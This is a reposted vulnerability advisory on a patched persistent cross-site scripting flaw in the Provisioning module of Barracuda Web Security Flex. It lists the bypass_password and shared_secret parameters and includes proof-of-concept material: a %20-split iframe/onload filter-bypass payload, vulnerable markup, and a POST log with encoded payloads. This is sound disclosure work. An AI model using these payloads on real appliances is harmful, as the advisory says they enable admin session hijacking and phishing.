Web Security Flex v4.x (BNSEC707) - Filter Bypass & Persistent Vulnerabilities

Editorial_Staff_Team's picture

Filter Bypass & Persistent Vulnerabilities in Shared Secret & Bypass Password patched!

Barracuda Networks announced a patch in the official web security flex appliance web-application. The two security issues has been reported by the vulnerability laboratory team. Barracuda has already resolved the issues and will soon publish a final security bulletin which will be connected to our advisory.

The persistent vulnerabilities was located in the "bypass_password" and "shared_secret" parameters of the `Remote Filtering > Safe Browser > Provisioning` module. The attacker is able to bypass the `shared password/secret` input field validation to manipulate the input field context. The script code execution occurs after the attacker clicked the `shared secret` information show/hide button in the `Provisioning` service module. The attack method is located on the application-side of the service and the request method to inject the payload is POST. 

To bypass the input field validation and execute the earlier injected string via POST, it is required to split (%20) the payload. During the pentests we revealed that script code executions (html,js & php) are possible. The input of the validation is broken and through the reverse function `hide/show` it is possible to manipulate the application context or capture the input.

The security risk of the persistent vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation requires low user inter action and a registered low privileged web application user account. Successful exploitation of the vulnerability results in session hijacking (manager/admin), persistent phishing, persistent external redirects or persistent manipulation of affected or connected module context. 

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] Web Security Flex

Vulnerable Module(s):
[+] Remote Filtering > Safe Browser > Provisioning

Vulnerable Function(s):
[+] hide input
[+] show input (reverse)

Vulnerable Parameter(s):
[+] bypass_password
[+] shared_secret

Affected Module(s):
[+] Provisioning

 

Proof of Concept Information:

The persistent web vulnerabilities can be exploited by remote attackers and local low privileged user accounts with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: String (Bypass %20)
%20<iframe%20src=a>%20%20%20%20\"><iframe src=a onload=alert(\"VL\") <

PoC: (Context Show & Hide Function) [bypass_password & shared_secret]

<div class=\"field\">
<label class=\"label\" for=\"bypass_password\">Bypass Password:</label>
<input name=\"bypass_password\" id=\"bypass_password\" value=\"northhigh\" type=\"password\">&#8203;&#8203;&#8203;&#8203;&#8203;
<small onclick=\"$(\'#bypass_password_ct\').show().find(\'strong\').html($(\'#bypass_password\').val())\" class=\"link2\">show</small>
<span class=\"info\" id=\"bypass_password_ct\" style=\"\">

<br> Password: \"
<strong>\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\")
<\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\") <\%20"><[PERSISTENT INJECTED SCRIPT CODE!]\") <\") <northhigh</iframe>&#8203;&#8203;&#8203;&#8203;&#8203;
</strong>\" —
<span class=\"link2\" onclick=\"$(this.parentNode).hide()\">hide</span></span>        </div>

--- POC Session Logs (MANIPULATED TO BYPASS) [POST] ---
auth_scheme=none
session_timeout=0
idle_timeout=0

shared_secret=%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da%3E%2520%2520
bypass_password=%20%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da%3E%2520%2520%2520%2520%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Da+onload%3Dalert(%22VL%22)+%3C

bypass_filter=192.168.*%3B10.10.*%3B172.16.*
fail_open=1
enable_geolocation=1
allow_temp_disable=1
allow_stop=1=
is_ajax=1
ajax_response_format=json

Reference(s):
https://wsf.127.0.0.1:1338/r/mobile

Video: https://www.youtube.com/watch?v=1D9PS4bW8VM

Advisory: http://www.vulnerability-lab.com/get_content.php?id=749

Rate this article: 
Average: 3 (4 votes)

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.